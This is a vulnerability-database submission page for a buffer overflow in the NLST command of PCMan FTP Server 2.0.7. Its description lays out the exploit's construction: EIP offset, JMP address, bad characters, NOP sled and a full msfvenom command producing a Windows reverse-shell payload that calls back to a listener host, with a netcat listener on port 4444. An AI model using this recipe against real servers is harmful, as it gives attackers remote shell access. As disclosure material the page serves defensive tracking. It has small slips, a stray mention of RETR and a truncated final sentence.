| Título | PCMan FTP Server 2.0.7 Buffer Overflow |
|---|
| Descrição | This vulnerability is found in the `NLST` command of PCMan 2.0.7.
The `RETR` command is typically used to download a file from the server.
However, when we send a `NLST` request containing 2006 bytes of offset data, we overwrite the EIP (Extended Instruction Pointer).
Once the 4 bytes of the EIP are reached, we overwrite it with a JMP instruction located at address `\x74\xe3\x2f\xd9`.
After identifying a suitable JMP address, we determined the list of bad characters to be `\x00`, `\x0a`, and `\x0d`. These characters needed to be excluded from the shellcode to avoid corrupting the payload.
With the buffer structure defined, we appended a shellcode generated using Metasploit’s msfvenom tool, with the following command:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.176.136 LPORT=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl
Note: We included a NOP sled consisting of 20 bytes of `0x90` (NOP instructions) before the shellcode to ensure proper alignment and stability during execution.
NOPs (No Operation instructions) act as a buffer zone, increasing the chances that the execution flow safely reaches the shellcode. This is a common technique in buffer overflow exploits.
In order for the reverse shell to work, Netcat must be running in listening mode on port 4444.
Once the exploit is successfully executed, the shellcode initiates a reverse connection, granting remote access to the vulnerable machine.
The exploit was tested in an environment running. |
|---|
| Fonte | ⚠️ https://github.com/r3ng4f/PCMan_1/blob/main/exploit02.txt |
|---|
| Utilizador | r3ng4f (UID 73285) |
|---|
| Submissão | 27/05/2025 14h55 (há 1 Ano) |
|---|
| Moderação | 29/05/2025 12h03 (2 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 310504 [PCMan FTP Server 2.0.7 NLST Command Excesso de tampão] |
|---|
| Pontos | 20 |
|---|